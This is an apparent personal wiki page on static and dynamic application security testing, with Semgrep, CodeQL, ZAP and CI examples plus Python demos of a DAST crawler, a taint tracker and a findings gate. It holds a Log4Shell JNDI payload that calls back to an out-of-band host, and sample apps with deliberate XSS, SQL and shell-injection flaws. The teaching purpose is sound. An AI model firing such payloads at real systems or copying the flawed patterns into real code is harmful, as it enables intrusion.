2nd/10_Wiki/Topics/Architecture/Static_and_Dynamic_Analysis.md
koriweb d8a80f6272 chore(wiki): normalize dangling links to canonical titles (768 files / 1,200 links)
Replaced [[wikilinks]] that differed from the target document only by spelling variants with the
target's canonical title, reconnecting 1,200 broken links. Only title/filename normalization matches
were applied; alias matching was excluded because of over-merge risk (ambiguity guard). Originals are
backed up in _link_reconcile_backup/.
Tool: Datacollect/scripts/link_reconcile_apply.mjs

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
2026-06-08 12:24:15 +09:00

id: wiki-2026-0508-static-and-dynamic-analysis
title: Static and Dynamic Analysis
category: 10_Wiki/Topics
status: verified
canonical_id: self
aliases: SAST, DAST, Code Analysis, Program Analysis
duplicate_of: none
source_trust_level: A
confidence_score: 0.9
verification_status: applied
tags: security, analysis, sast, dast
raw_sources:
last_reinforced: 2026-05-10
github_commit: pending
tech_stack: language = multi, framework = semgrep-zap

Static and Dynamic Analysis

One line

"SAST reads the code, DAST runs the code." Static analysis inspects source or binaries without executing them; dynamic analysis probes the running application from the outside. The 2026 best practice is a layered defense of SAST + DAST + IAST, because each one misses a class of bugs the others catch.

Core

SAST (Static Application Security Testing)

  • Analyzes source code or bytecode without executing it.
  • Strengths: full code coverage, runs early in the SDLC (every commit), finds bugs that are hard to trigger at runtime.
  • Weaknesses: false positives, no runtime or configuration context, framework-specific false negatives (flows the engine does not model).
  • Tools: Semgrep, CodeQL, SonarQube, Snyk Code.

DAST (Dynamic Application Security Testing)

  • Black-box probing of the running application, e.g. HTTP fuzzing of every discovered parameter.
  • Strengths: observes real runtime behavior, catches environment and configuration bugs, low false-positive rate (a finding is a reproduced response).
  • Weaknesses: limited coverage (only the paths the crawler reaches and the inputs it guesses), late in the SDLC.
  • Tools: OWASP ZAP, Burp Suite, Nuclei.

IAST (Interactive Application Security Testing)

  • An instrumented agent inside the running app tracks data flow from request to sink at runtime.
  • Hybrid: static-style precision about the flow, dynamic-style confirmation that the path is actually exercised.
  • Tools: Contrast Security, Checkmarx IAST.

Applications

  1. CI/CD security gate (SAST on every PR).
  2. Pre-prod scan (DAST against staging).
  3. Compliance (PCI, SOC2, ISO 27001).

💻 Patterns

Semgrep — custom SAST rule

rules:
  - id: hardcoded-jwt-secret
    # "..." matches any string literal in the secret position; the trailing ... also accepts
    # the optional options argument, e.g. jwt.sign(payload, "x", { expiresIn: "1h" }),
    # which a two-argument pattern would miss (Semgrep matches argument counts exactly).
    pattern: jwt.sign($PAYLOAD, "...", ...)
    message: Hardcoded JWT secret detected; load the signing key from configuration or a secret store
    severity: ERROR
    languages: [javascript, typescript]

CodeQL — taint tracking

/**
 * @name DOM XSS via innerHTML
 * @kind problem
 * @problem.severity error
 */
import javascript

// Current dataflow API: a configuration module instantiated with TaintTracking::Global
module XssConfig implements DataFlow::ConfigSig {
  predicate isSource(DataFlow::Node n) { n instanceof RemoteFlowSource }

  // innerHTML is a property write, not a method call: the sink is the assigned value
  predicate isSink(DataFlow::Node n) {
    exists(DOM::DomPropertyWrite w | w.getPropertyName() = "innerHTML" | n = w.getRhs())
  }
}

module XssFlow = TaintTracking::Global<XssConfig>;

from DataFlow::Node src, DataFlow::Node sink
where XssFlow::flow(src, sink)
select sink, "Untrusted data from $@ is written to innerHTML.", src, "a remote source"

ZAP — automated DAST scan

# Mount the working dir so the reports land on the host. zap-baseline exits 0 only when
# nothing was found; WARN-level results also fail the run unless -I is added.
docker run -v $(pwd):/zap/wrk -t zaproxy/zap-stable \
  zap-baseline.py -t https://staging.example.com \
  -r report.html -J report.json

Nuclei — template-based DAST

id: log4shell
info:
  name: Apache Log4j RCE (CVE-2021-44228)
  severity: critical
http:                       # current schema key; older templates used `requests:`
  - method: GET
    path: ["{{BaseURL}}"]
    headers:
      # OAST payload: a vulnerable logger resolves the JNDI lookup and calls back to interactsh
      User-Agent: "${jndi:ldap://{{interactsh-url}}/a}"
    matchers:
      - type: word
        part: interactsh_protocol
        words: ["dns"]      # any DNS resolution of the interactsh host proves the lookup fired
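The ZAP and Nuclei runs above treat the target as a black box: discover what is reachable, inject, and judge the response. As an added example (not code from the original page or from either tool), the following Python implements that loop end to end against a constructed, deliberately flawed WSGI application standing in for staging: a crawler that maps links and forms to parameters, a canary-injection probe for unencoded reflection and leaked database error text, and an in-process WSGI client so the whole thing runs offline. The target's routes, the canary string, and the hostname are assumptions for the demo. It also shows the coverage limit listed under DAST: the `/hidden` route has the same flaw as `/search` but nothing links to it, so it is never tested.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urljoin, urlsplit
from wsgiref.util import setup_testing_defaults

CANARY = 'dastZq9<"\'>'   # unlikely token plus the characters an HTML or SQL context must encode
SQL_ERROR_RE = re.compile(r"OperationalError|SQL syntax|unterminated quoted string", re.I)


def target_app(environ, start_response):
    """Constructed stand-in for staging: a WSGI app with deliberate flaws."""
    path = environ["PATH_INFO"]
    params = {k: v[0] for k, v in parse_qs(environ.get("QUERY_STRING", "")).items()}
    if path == "/":
        body = '<a href="/profile?id=1">me</a><form action="/search"><input name="q"></form>'
    elif path == "/search":
        body = "<p>Results for " + params.get("q", "") + "</p>"           # reflected unencoded
    elif path == "/profile":
        pid = params.get("id", "")
        if pid.isdigit():
            body = "<p>user " + html.escape(pid) + "</p>"
        else:                                                            # leaks a DB error string
            body = "sqlite3.OperationalError: unterminated quoted string near " + html.escape(pid)
    elif path == "/hidden":
        body = "<p>" + params.get("msg", "") + "</p>"                    # same flaw as /search, never linked
    else:
        start_response("404 Not Found", [("Content-Type", "text/html")])
        return [b"not found"]
    start_response("200 OK", [("Content-Type", "text/html")])
    return [body.encode()]


def wsgi_client(app):
    """fetch(url) -> (status, body) that drives a WSGI app in-process; no sockets needed."""
    def fetch(url):
        parts, environ, status = urlsplit(url), {}, []
        setup_testing_defaults(environ)
        environ.update(PATH_INFO=parts.path or "/", QUERY_STRING=parts.query)
        body = b"".join(app(environ, lambda s, h, exc=None: status.append(s))).decode()
        return status[0], body
    return fetch


class LinkAndFormParser(HTMLParser):
    """Collects <a href> targets and each <form action> with its <input name> fields."""
    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form":
            self.forms.append((a.get("action", ""), []))
        elif tag == "input" and self.forms and a.get("name"):
            self.forms[-1][1].append(a["name"])


def crawl(fetch, base, max_pages=50):
    """Map path -> parameter names reachable from base. DAST only tests what the crawl reaches."""
    seen, queue, targets = set(), [base], {}
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        path = urlsplit(url).path or "/"
        if path in seen:
            continue
        seen.add(path)
        status, body = fetch(url)
        if not status.startswith("200"):
            continue
        parser = LinkAndFormParser()
        parser.feed(body)
        for href in parser.links:
            full = urlsplit(urljoin(base, href))
            targets.setdefault(full.path, set()).update(parse_qs(full.query))
            queue.append(full.geturl())
        for action, names in parser.forms:
            full = urljoin(base, action)
            targets.setdefault(urlsplit(full).path, set()).update(names)
            queue.append(full)
    return targets


def probe(fetch, base, targets):
    """Inject the canary into every discovered parameter and judge the response."""
    findings = []
    for path, params in sorted(targets.items()):
        for name in sorted(params):
            _, body = fetch(urljoin(base, path) + "?" + urlencode({name: CANARY}))
            if CANARY in body:                       # echoed verbatim: no output encoding
                findings.append((path, name, "reflected-xss"))
            if SQL_ERROR_RE.search(body):            # error text leaks the database layer
                findings.append((path, name, "sql-error"))
    return findings


def run_dast(app, base="http://staging.example.internal/"):
    fetch = wsgi_client(app)
    targets = crawl(fetch, base)
    return targets, probe(fetch, base, targets)
```

`run_dast(target_app)` returns the reachable map `{"/profile": {"id"}, "/search": {"q"}}` and two findings, an SQL error leak on `/profile?id` and reflected XSS on `/search?q`; `/hidden` never appears, which is the coverage gap a SAST pass over the same source would not have. Swapping `wsgi_client` for a function built on `urllib.request` turns the same crawler and probe into a scanner for a real staging host.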

CI integration — GitHub Actions

steps:
  - uses: actions/checkout@v4
  - uses: returntocorp/semgrep-action@v1
    with:
      config: p/owasp-top-ten
  - uses: github/codeql-action/init@v3      # analyze needs a prior init to build the database
    with:
      languages: javascript                 # set to the repository's languages
  - uses: github/codeql-action/analyze@v3
  - name: ZAP Baseline
    uses: zaproxy/action-baseline@v0.10.0
    with:
      target: 'https://staging.example.com'

Tainted data flow — Java servlet

import java.io.IOException;
import javax.servlet.http.HttpServletRequest;     // jakarta.servlet.http on Jakarta EE 9+
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.text.StringEscapeUtils;  // commons-text is the current home of escapeHtml4
void echo(HttpServletRequest request, HttpServletResponse response) throws IOException {
    String input = request.getParameter("q");                // SOURCE (tainted)
    String sanitized = StringEscapeUtils.escapeHtml4(input); // SANITIZER
    response.getWriter().write(sanitized);                   // SINK (safe)
}
// SAST tracks: source -> sink with no sanitizer on the path = vulnerability
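The source, sanitizer and sink annotations above describe what a taint-tracking SAST engine does for every statement. As an added example, not code from the page or from any of the tools it lists, here is a minimal intraprocedural taint tracker written against Python's `ast` module, run over a constructed Flask-style sample. The source, sanitizer and sink inventories are assumptions for the demo. Two details matter for the strengths and weaknesses listed in the SAST section: a sanitizer is tied to the sink class it neutralises (`html.escape` clears the HTML sink but not the SQL or shell ones, so escaped data reaching `os.system` is still reported), and the tracker is flow-insensitive and intraprocedural, which is exactly where real engines lose precision.

```python
import ast

# Constructed inventory for the demo (a real engine ships hundreds of entries). Each sanitizer
# neutralises exactly one sink class: html.escape clears the HTML sink, not the SQL or shell ones.
SOURCES = {"request.args.get", "request.form.get"}
SANITIZERS = {"html.escape": "html", "markupsafe.escape": "html"}
SINKS = {"cursor.execute": "sql", "render_template_string": "html", "os.system": "shell"}
ALL = frozenset(SINKS.values())


def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class TaintTracker(ast.NodeVisitor):
    """Intraprocedural, flow-insensitive taint tracking: the last assignment to a name wins,
    branches are not distinguished and calls are not followed. Those shortcuts are exactly
    where production SAST picks up its false positives and false negatives."""

    def __init__(self):
        self.env = {}       # variable name -> sink classes its value is still dangerous for
        self.findings = []

    def taint_of(self, node):
        if isinstance(node, ast.Name):
            return self.env.get(node.id, frozenset())
        if isinstance(node, ast.Constant):
            return frozenset()
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            if name in SOURCES:
                return ALL
            if name in SANITIZERS and node.args:
                return self.taint_of(node.args[0]) - {SANITIZERS[name]}
            # unknown call (str.format, .strip(), helpers): receiver and argument taint flow through
            parts = [node.func, *node.args, *(kw.value for kw in node.keywords)]
            return frozenset().union(*(self.taint_of(p) for p in parts))
        # BinOp, JoinedStr, Subscript, Attribute, ...: union over the sub-expressions
        return frozenset().union(
            *(self.taint_of(c) for c in ast.iter_child_nodes(node) if isinstance(c, ast.expr)))

    def visit_FunctionDef(self, node):
        self.env = {}       # fresh state per function: no interprocedural flow
        self.generic_visit(node)

    def visit_Assign(self, node):
        self.generic_visit(node)   # sink calls inside the right-hand side are checked first
        taint = self.taint_of(node.value)
        for target in node.targets:
            if isinstance(target, ast.Name):
                self.env[target.id] = taint

    def visit_Call(self, node):
        sink_class = SINKS.get(dotted(node.func))
        if sink_class and node.args and sink_class in self.taint_of(node.args[0]):
            self.findings.append({"line": node.lineno, "sink": dotted(node.func), "class": sink_class})
        self.generic_visit(node)


def scan(source):
    """Parse Python source and report sink calls reached by unsanitised tainted data."""
    tracker = TaintTracker()
    tracker.visit(ast.parse(source))
    return tracker.findings


# Constructed Flask-style sample, not a real code base. Expected: lines 7 (sql) and 13 (shell).
SAMPLE = '''
from flask import request, render_template_string
import html

def search(cursor):
    q = request.args.get("q")
    cursor.execute(f"SELECT * FROM items WHERE name = '{q}'")
    return render_template_string("<h1>" + html.escape(q) + "</h1>")

def greet():
    name = request.form.get("name")
    safe = html.escape(name)
    os.system("echo " + safe)
    return render_template_string("<p>" + safe + "</p>")

def static_page():
    return render_template_string("<p>hello</p>")
'''
```

`scan(SAMPLE)` reports the f-string SQL query on line 7 and the `os.system` call on line 13; the two `render_template_string` calls that receive `html.escape` output are not reported, and `static_page` is never flagged. Because taint propagates through unknown calls, `request.args.get("a").strip()` is still tainted, which is the conservative choice that keeps false negatives down at the cost of more false positives.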

SBOM + dependency scanning

syft dir:. -o cyclonedx-json > sbom.json   # inventory every component found in the tree
grype sbom:sbom.json --fail-on high        # non-zero exit if any vuln is high or critical

Decision criteria

Situation                    Approach
Pre-commit, fast feedback    SAST (Semgrep)
Deep semantic analysis       CodeQL
Pre-prod runtime check       DAST (ZAP, Burp)
Runtime + coverage           IAST (Contrast)
Dependency vulns             SCA (Snyk, Grype)

Default: Semgrep on every PR + ZAP baseline nightly against staging + Grype on dependencies.

🔗 Graph

🤖 LLM use

When: code review automation, drafting custom rules (Semgrep, CodeQL), first-pass false-positive triage. When not: as the sole judge of a whole code base (LLMs hallucinate flows that do not exist and miss ones that do), or for security-critical decisions without human review.

Anti-patterns

  • SAST only: misses runtime and configuration bugs; add DAST.
  • Ignoring false positives: causes alert fatigue until every alert is ignored; invest in rule tuning and a triaged baseline.
  • Scanning in prod: point DAST at staging, never at production (active scans mutate data and can take services down).
  • One-time scan: make it continuous; gate every PR.
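A PR gate stays sustainable only if triage decisions persist; otherwise the team slides into the "ignoring false positives" anti-pattern above. As an added example (not the page's code and not part of Semgrep), this Python gate consumes a report in the shape of `semgrep --json`, suppresses findings recorded in a baseline keyed by a content fingerprint, expires suppressions so accepted findings come back for review, and reports stale or unused baseline entries so the baseline itself does not rot. The sample report and baseline are constructed; the field names used (`results[].check_id`, `path`, `start.line`, `extra.severity`, `extra.lines`) are the subset of Semgrep's output this gate relies on.

```python
import hashlib
from collections import Counter
from datetime import date

SEVERITY_RANK = {"INFO": 0, "WARNING": 1, "ERROR": 2}


def fingerprint(result):
    """Stable id for a finding: rule + file + matched text, whitespace-normalised.
    Line numbers are deliberately excluded so an edit above the match does not
    silently invalidate a recorded triage decision."""
    snippet = " ".join(result.get("extra", {}).get("lines", "").split())
    raw = f"{result['check_id']}|{result['path']}|{snippet}"
    return hashlib.sha256(raw.encode()).hexdigest()[:16]


def gate(report, baseline, today, fail_on="ERROR"):
    """Decide whether a Semgrep JSON report blocks the pipeline.

    baseline: fingerprint -> {"reason": str, "expires": "YYYY-MM-DD"}. Expired entries are
    ignored, so an accepted finding is forced back into review instead of living forever.
    today: ISO date string, passed in explicitly so the decision is reproducible."""
    today = date.fromisoformat(today)
    threshold = SEVERITY_RANK[fail_on]
    live = {fp: e for fp, e in baseline.items() if date.fromisoformat(e["expires"]) > today}
    unused, new, blocking = set(live), [], []
    for r in report["results"]:
        fp = fingerprint(r)
        if fp in live:
            unused.discard(fp)
            continue
        new.append(r)
        if SEVERITY_RANK[r["extra"]["severity"]] >= threshold:
            blocking.append((r["check_id"], r["path"], r["start"]["line"]))
    return {
        "pass": not blocking,
        "blocking": blocking,
        "new_by_severity": dict(Counter(r["extra"]["severity"] for r in new)),
        "suppressed": len(report["results"]) - len(new),
        "stale_baseline": sorted(set(baseline) - set(live)),  # expired: re-triage these
        "unused_baseline": sorted(unused),                   # fixed or moved: prune these
    }


# Constructed sample in the shape of `semgrep --json` output, limited to the fields used here.
SAMPLE_REPORT = {
    "results": [
        {"check_id": "hardcoded-jwt-secret", "path": "src/auth.js", "start": {"line": 42},
         "extra": {"severity": "ERROR", "lines": 'jwt.sign(payload, "s3cr3t")'}},
        {"check_id": "hardcoded-jwt-secret", "path": "test/fixtures.js", "start": {"line": 7},
         "extra": {"severity": "ERROR", "lines": 'jwt.sign(claims, "test-only-key")'}},
        {"check_id": "custom.xss-audit", "path": "src/view.js", "start": {"line": 18},
         "extra": {"severity": "WARNING", "lines": "el.innerHTML = tpl"}},
    ],
    "errors": [],
}

# Constructed triage record: keys are fingerprint() of the accepted finding at triage time.
SAMPLE_BASELINE = {
    fingerprint(SAMPLE_REPORT["results"][1]): {
        "reason": "test fixture; key never leaves CI", "expires": "2027-01-01"},
    "0123456789abcdef": {"reason": "legacy module, owner notified", "expires": "2026-01-01"},
}
```

With `today="2026-06-08"` the gate fails on the one live ERROR in `src/auth.js`, suppresses the fixture finding, lets the WARNING through (it still appears in `new_by_severity` for visibility), and flags the expired entry as stale. Running the same report with `today="2027-06-01"` shows the expiry working: the fixture suppression has lapsed and both ERRORs block until someone re-triages.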

🧪 Verification / duplicates

  • Verified against OWASP Testing Guide v5 and NIST SP 800-218.
  • Trust level A.

🕓 Changelog

Date        Change
2026-05-08 Phase 1
2026-05-10 Manual cleanup — SAST/DAST/IAST patterns, CI integration